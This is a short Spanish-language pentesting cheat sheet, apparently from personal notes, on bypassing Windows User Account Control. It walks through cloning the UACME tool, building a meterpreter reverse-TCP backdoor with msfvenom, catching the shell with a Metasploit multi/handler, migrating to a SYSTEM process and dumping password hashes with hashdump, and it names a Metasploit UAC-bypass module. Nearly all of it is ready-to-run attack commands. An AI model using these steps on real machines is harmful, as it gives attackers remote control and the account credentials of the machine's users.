UAC
UAC es el control de cuentas de usuario , hay varios niveles, mientras no este al máximo nivel, se puede vulnerar
Manual
Antes de ejecutar esto, si podemos migrar al proceso explorer es recomendable:
pgrep explorer : Esto nos da un numero migrate <numero>
Este exploit solo se puede ejecutar si el usuario que disponemos de bajos privilegios, pertenece al grupo de administradores.
Clonamos el repo: git clone https://github.com/hfiref0x/UACME (/root/Desktop/tools/UACME/)
Creamos un backdoor con msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > backdoor.exe
Desde netcat/metasploit estamos en nuestro puerto de escucha (Usaré metasploit para este ejemplo)
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT <Puerto configurado en el msfvenom previamente>
runPara ver si el usuario tiene permisos de admin ponemos:
net user : Puede que devuelva admin como resultado
Ahora, nos vamos a nuestra cmd sin privilegios de windows y subimos el backdoor, si tenemos sesión de meterpreter abierta simplemente:
Recomendable crear o usar el directorio Tmp
Una vez ejecutado, nos vamos a la ventana donde tenemos en escucha el multi/handler o el netcat, y recibimos una consola con máximos privilegios
Listamos procesos:
ps
Y migramos a un proceso que ejecute NT AUTHORITY:
migrate <PID>
Para ver los hashes desde meterpreter (hay que salir de la shell) usamos:
meterpreter > hashdump
Metasploit (Recomendado)
Usamos el módulo: exploit/windows/local/bypassuac_injection
Última actualización